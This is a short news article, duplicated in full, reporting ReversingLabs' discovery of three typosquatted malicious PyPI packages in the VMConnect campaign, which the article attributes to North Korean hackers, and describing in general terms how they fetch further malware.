How malicious Python packages infect the system and what their developers goals are.
Three new malicious Python packages were discovered on the popular PyPI repository. According to experts, they are part of the VMConnect campaign, which is most likely organized by North Korean hackers.
Packages published under the names tablediter, request-plus, and requestspro were identified by the cybersecurity organization ReversingLabs .
The VMConnect campaign uses Python libraries to mimic popular open source tools. Once installed, they automatically download additional malware.
Attackers use the typosquatting technique to make malicious extensions appear legitimate. To do this, use names that are very similar to the names of popular libraries, which can confuse developers and avoid detection.
One of the packages, tablediter, does not activate its malicious code immediately after installation in order to evade security systems.
The program inside tablediter runs in an infinite loop. It regularly communicates with an external server to download and activate code encrypted in Base64 format. Now the exact nature of the code remains unknown, which adds an additional degree of uncertainty and risk for specialists.
Two other packages, request-plus and requestspro, collect information about the infected computer and transmit it to the management server.
After establishing a connection with the management server, the infected system receives a specialized token. It is sent back, but to a different address on the same server. The response includes an encoded Python module and a download link.
The researchers assume that the module uses this link to start downloading the next phase of malware.
The scenarios of current attacks and other known incidents, such as attacks on JumpCloud and the npm campaign, are suspiciously similar. This fact supports the version about the intervention of North Korean hackers. Interestingly, in other operations, the attackers pursued financial gain and mainly attacked cryptocurrency platforms.
Similar attacks were found in the macOS and Linux operating systems. This is just the latest example in a series of attacks on users of the PyPI repository, underscoring that security experts should be on their guard.
Three new malicious Python packages were discovered on the popular PyPI repository. According to experts, they are part of the VMConnect campaign, which is most likely organized by North Korean hackers.
Packages published under the names tablediter, request-plus, and requestspro were identified by the cybersecurity organization ReversingLabs .
The VMConnect campaign uses Python libraries to mimic popular open source tools. Once installed, they automatically download additional malware.
Attackers use the typosquatting technique to make malicious extensions appear legitimate. To do this, use names that are very similar to the names of popular libraries, which can confuse developers and avoid detection.
One of the packages, tablediter, does not activate its malicious code immediately after installation in order to evade security systems.
The program inside tablediter runs in an infinite loop. It regularly communicates with an external server to download and activate code encrypted in Base64 format. Now the exact nature of the code remains unknown, which adds an additional degree of uncertainty and risk for specialists.
Two other packages, request-plus and requestspro, collect information about the infected computer and transmit it to the management server.
After establishing a connection with the management server, the infected system receives a specialized token. It is sent back, but to a different address on the same server. The response includes an encoded Python module and a download link.
The researchers assume that the module uses this link to start downloading the next phase of malware.
The scenarios of current attacks and other known incidents, such as attacks on JumpCloud and the npm campaign, are suspiciously similar. This fact supports the version about the intervention of North Korean hackers. Interestingly, in other operations, the attackers pursued financial gain and mainly attacked cryptocurrency platforms.
Similar attacks were found in the macOS and Linux operating systems. This is just the latest example in a series of attacks on users of the PyPI repository, underscoring that security experts should be on their guard.
